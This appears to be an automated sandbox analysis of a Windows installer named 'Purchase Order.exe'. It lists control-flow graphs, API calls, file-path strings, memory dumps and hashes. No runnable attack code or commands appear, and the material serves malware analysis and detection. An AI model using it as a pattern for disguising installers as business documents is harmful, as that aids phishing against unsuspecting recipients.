                                                                                                  control_flow_graph 427 405f19-405f24 428 405f26-405f35 427->428 429 405f37-405f4c 427->429 428->429 430 405f52-405f5d 429->430 431 40613f-406143 429->431 430->431 432 405f63-405f6a 430->432 433 406149-406153 431->433 434 405f6f-405f79 431->434 432->431 436 406155-406159 call 405ef7 433->436 437 40615e-40615f 433->437 434->433 435 405f7f-405f86 434->435 438 406132 435->438 439 405f8c-405fc1 435->439 436->437 441 406134-40613a 438->441 442 40613c-40613e 438->442 443 405fc7-405fd2 GetVersion 439->443 444 4060dc-4060df 439->444 441->431 442->431 445 405fd4-405fd8 443->445 446 405fec 443->446 447 4060e1-4060e4 444->447 448 40610f-406112 444->448 445->446 451 405fda-405fde 445->451 454 405ff3-405ffa 446->454 452 4060f4-406100 call 405ef7 447->452 453 4060e6-4060f2 call 405e55 447->453 449 406120-406130 lstrlenA 448->449 450 406114-40611b call 405f19 448->450 449->431 450->449 451->446 456 405fe0-405fe4 451->456 465 406105-40610b 452->465 453->465 458 405ffc-405ffe 454->458 459 405fff-406001 454->459 456->446 461 405fe6-405fea 456->461 458->459 463 406003-40601e call 405dde 459->463 464 40603a-40603d 459->464 461->454 470 406023-406026 463->470 468 40604d-406050 464->468 469 40603f-40604b GetSystemDirectoryA 464->469 465->449 467 40610d 465->467 471 4060d4-4060da call 406162 467->471 473 406052-406060 GetWindowsDirectoryA 468->473 474 4060ba-4060bc 468->474 472 4060be-4060c1 469->472 475 4060c3-4060c7 470->475 476 40602c-406035 call 405f19 470->476 471->449 472->471 472->475 473->474 474->472 477 406062-40606c 474->477 475->471 480 4060c9-4060cf lstrcatA 475->480 476->472 482 406086-40609c SHGetSpecialFolderLocation 477->482 483 40606e-406071 477->483 480->471 486 4060b7 482->486 487 40609e-4060b5 SHGetPathFromIDListA CoTaskMemFree 482->487 483->482 485 406073-40607a 483->485 488 406082-406084 485->488 486->474 487->472 487->486 488->472 488->482
                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000), ref: 00405FCA
                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406045
                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00406058
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 004060A2
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004060AD
                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000), ref: 00406121
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-1446170568
                                                                                                  • Opcode ID: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
                                                                                                  • Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
                                                                                                  • Opcode Fuzzy Hash: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
                                                                                                  • Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 489 405799-4057bf call 405a57 492 4057c1-4057d3 DeleteFileA 489->492 493 4057d8-4057df 489->493 494 405962-405966 492->494 495 4057e1-4057e3 493->495 496 4057f2-405802 call 405ef7 493->496 497 405910-405915 495->497 498 4057e9-4057ec 495->498 502 405811-405812 call 4059b0 496->502 503 405804-40580f lstrcatA 496->503 497->494 500 405917-40591a 497->500 498->496 498->497 504 405924-40592c call 4061fb 500->504 505 40591c-405922 500->505 506 405817-40581a 502->506 503->506 504->494 513 40592e-405942 call 405969 call 405751 504->513 505->494 509 405825-40582b lstrcatA 506->509 510 40581c-405823 506->510 512 405830-40584e lstrlenA FindFirstFileA 509->512 510->509 510->512 514 405854-40586b call 405994 512->514 515 405906-40590a 512->515 525 405944-405947 513->525 526 40595a-40595d call 405110 513->526 523 405876-405879 514->523 524 40586d-405871 514->524 515->497 517 40590c 515->517 517->497 528 40587b-405880 523->528 529 40588c-40589a call 405ef7 523->529 524->523 527 405873 524->527 525->505 531 405949-405958 call 405110 call 405db2 525->531 526->494 527->523 533 405882-405884 528->533 534 4058e5-4058f7 FindNextFileA 528->534 539 4058b1-4058bc call 405751 529->539 540 40589c-4058a4 529->540 531->494 533->529 538 405886-40588a 533->538 534->514 537 4058fd-405900 FindClose 534->537 537->515 538->529 538->534 549 4058dd-4058e0 call 405110 539->549 550 4058be-4058c1 539->550 540->534 542 4058a6-4058af call 405799 540->542 542->534 549->534 552 4058c3-4058d3 call 405110 call 405db2 550->552 553 4058d5-4058db 550->553 552->534 553->534
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,00000000), ref: 004057C2
                                                                                                  • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
                                                                                                  • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
                                                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
                                                                                                  • FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
                                                                                                  • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405900
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$8B$\*.*
                                                                                                  • API String ID: 2035342205-50530147
                                                                                                  • Opcode ID: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
                                                                                                  • Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
                                                                                                  • Opcode Fuzzy Hash: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
                                                                                                  • Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing, xrefs: 0040218C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing
                                                                                                  • API String ID: 123533781-2517315260
                                                                                                  • Opcode ID: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
                                                                                                  • Instruction ID: 13bc962cd5a1e0844f107594f4b7cb0b9a1bacf2988c66099de3663f442cfceb
                                                                                                  • Opcode Fuzzy Hash: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
                                                                                                  • Instruction Fuzzy Hash: 5A5107B5E00208BFCB00DFE4C988A9DBBB6EF48314F2445AAF515FB2D1DA799941CB54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                                                                                  • Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
                                                                                                  • Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                                                                                  • Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406212
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID: C:\
                                                                                                  • API String ID: 2295610775-3404278061
                                                                                                  • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                                  • Instruction ID: 9db82b8fa8063fa17328456ed946e1162a1eeecbf7bffbc6415ee5c88b4ce2a6
                                                                                                  • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                                  • Instruction Fuzzy Hash: 6FD0133555D02057C30027746C0C44779545F653307124B77F456F52F0D3345C7245DD
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
                                                                                                  • Instruction ID: 73f39e672a50c1adebb7c94b7850a11d736dff73d217dd7b8340578855458d28
                                                                                                  • Opcode Fuzzy Hash: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
                                                                                                  • Instruction Fuzzy Hash: 2CF02772604004AAC700EB6499089EEB778DB15324F60007BF180B20C0C7B84A429B2A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 179 403c09-403c1b 180 403c21-403c27 179->180 181 403d5c-403d6b 179->181 180->181 182 403c2d-403c36 180->182 183 403dba-403dcf 181->183 184 403d6d-403db5 GetDlgItem * 2 call 4040dc SetClassLongA call 40140b 181->184 185 403c38-403c45 SetWindowPos 182->185 186 403c4b-403c4e 182->186 188 403dd1-403dd4 183->188 189 403e0f-403e14 call 404128 183->189 184->183 185->186 190 403c50-403c62 ShowWindow 186->190 191 403c68-403c6e 186->191 193 403dd6-403de1 call 401389 188->193 194 403e07-403e09 188->194 196 403e19-403e34 189->196 190->191 197 403c70-403c85 DestroyWindow 191->197 198 403c8a-403c8d 191->198 193->194 216 403de3-403e02 SendMessageA 193->216 194->189 201 4040a9 194->201 202 403e36-403e38 call 40140b 196->202 203 403e3d-403e43 196->203 205 404086-40408c 197->205 207 403ca0-403ca6 198->207 208 403c8f-403c9b SetWindowLongA 198->208 204 4040ab-4040b2 201->204 202->203 212 404067-404080 DestroyWindow EndDialog 203->212 213 403e49-403e54 203->213 205->201 210 40408e-404094 205->210 214 403d49-403d57 call 404143 207->214 215 403cac-403cbd GetDlgItem 207->215 208->204 210->201 217 404096-40409f ShowWindow 210->217 212->205 213->212 218 403e5a-403ea7 call 405f19 call 4040dc * 3 GetDlgItem 213->218 214->204 219 403cdc-403cdf 215->219 220 403cbf-403cd6 SendMessageA IsWindowEnabled 215->220 216->204 217->201 249 403eb1-403eed ShowWindow KiUserCallbackDispatcher call 4040fe EnableWindow 218->249 250 403ea9-403eae 218->250 224 403ce1-403ce2 219->224 225 403ce4-403ce7 219->225 220->201 220->219 227 403d12-403d17 call 4040b5 224->227 228 403cf5-403cfa 225->228 229 403ce9-403cef 225->229 227->214 230 403d30-403d43 SendMessageA 228->230 231 403cfc-403d02 228->231 229->230 234 403cf1-403cf3 229->234 230->214 235 403d04-403d0a call 40140b 231->235 236 403d19-403d22 call 40140b 231->236 234->227 245 403d10 235->245 236->214 246 403d24-403d2e 236->246 245->227 246->245 253 403ef2 249->253 254 403eef-403ef0 249->254 250->249 255 403ef4-403f22 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403f24-403f35 SendMessageA 255->256 257 403f37 255->257 258 403f3d-403f76 call 404111 call 405ef7 lstrlenA call 405f19 SetWindowTextA call 401389 256->258 257->258 258->196 267 403f7c-403f7e 258->267 267->196 268 403f84-403f88 267->268 269 403fa7-403fbb DestroyWindow 268->269 270 403f8a-403f90 268->270 269->205 272 403fc1-403fee CreateDialogParamA 269->272 270->201 271 403f96-403f9c 270->271 271->196 273 403fa2 271->273 272->205 274 403ff4-40404b call 4040dc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->201 274->201 279 40404d-404060 ShowWindow call 404128 274->279 281 404065 279->281 281->205
                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
                                                                                                  • ShowWindow.USER32(?), ref: 00403C62
                                                                                                  • DestroyWindow.USER32 ref: 00403C76
                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CB3
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403CCE
                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D7C
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D86
                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
                                                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E97
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EB8
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECA
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403EE5
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F02
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
                                                                                                  • lstrlenA.KERNEL32(Nonbeneficial Setup: Installing,?,Nonbeneficial Setup: Installing,00422F20), ref: 00403F56
                                                                                                  • SetWindowTextA.USER32(?,Nonbeneficial Setup: Installing), ref: 00403F65
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404099
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                  • String ID: Nonbeneficial Setup: Installing
                                                                                                  • API String ID: 3282139019-485038270
                                                                                                  • Opcode ID: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
                                                                                                  • Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
                                                                                                  • Opcode Fuzzy Hash: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
                                                                                                  • Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 282 403877-40388f call 406290 285 403891-4038a1 call 405e55 282->285 286 4038a3-4038d4 call 405dde 282->286 293 4038f7-403920 call 403b3c call 405a57 285->293 291 4038d6-4038e7 call 405dde 286->291 292 4038ec-4038f2 lstrcatA 286->292 291->292 292->293 300 403926-40392b 293->300 301 4039a7-4039af call 405a57 293->301 300->301 302 40392d-403945 call 405dde 300->302 307 4039b1-4039b8 call 405f19 301->307 308 4039bd-4039e2 LoadImageA 301->308 306 40394a-403951 302->306 306->301 309 403953-403955 306->309 307->308 311 403a63-403a6b call 40140b 308->311 312 4039e4-403a14 RegisterClassA 308->312 314 403966-403972 lstrlenA 309->314 315 403957-403964 call 405994 309->315 324 403a75-403a80 call 403b3c 311->324 325 403a6d-403a70 311->325 316 403b32 312->316 317 403a1a-403a5e SystemParametersInfoA CreateWindowExA 312->317 321 403974-403982 lstrcmpiA 314->321 322 40399a-4039a2 call 405969 call 405ef7 314->322 315->314 320 403b34-403b3b 316->320 317->311 321->322 323 403984-40398e GetFileAttributesA 321->323 322->301 328 403990-403992 323->328 329 403994-403995 call 4059b0 323->329 335 403a86-403aa0 ShowWindow call 406222 324->335 336 403b09-403b0a call 4051e2 324->336 325->320 328->322 328->329 329->322 343 403aa2-403aa7 call 406222 335->343 344 403aac-403abe GetClassInfoA 335->344 339 403b0f-403b11 336->339 341 403b13-403b19 339->341 342 403b2b-403b2d call 40140b 339->342 341->325 345 403b1f-403b26 call 40140b 341->345 342->316 343->344 348 403ac0-403ad0 GetClassInfoA RegisterClassA 344->348 349 403ad6-403af9 DialogBoxParamA call 40140b 344->349 345->325 348->349 352 403afe-403b07 call 4037c7 349->352 352->320
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                                                                                    • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                                                                                  • lstrcatA.KERNEL32(1033,Nonbeneficial Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nonbeneficial Setup: Installing,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 004038F2
                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously,1033,Nonbeneficial Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nonbeneficial Setup: Installing,00000000,00000002,75923410), ref: 00403967
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
                                                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403985
                                                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously), ref: 004039CE
                                                                                                    • Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62
                                                                                                  • RegisterClassA.USER32(00422EC0), ref: 00403A0B
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403A8E
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
                                                                                                  • RegisterClassA.USER32(00422EC0), ref: 00403AD0
                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
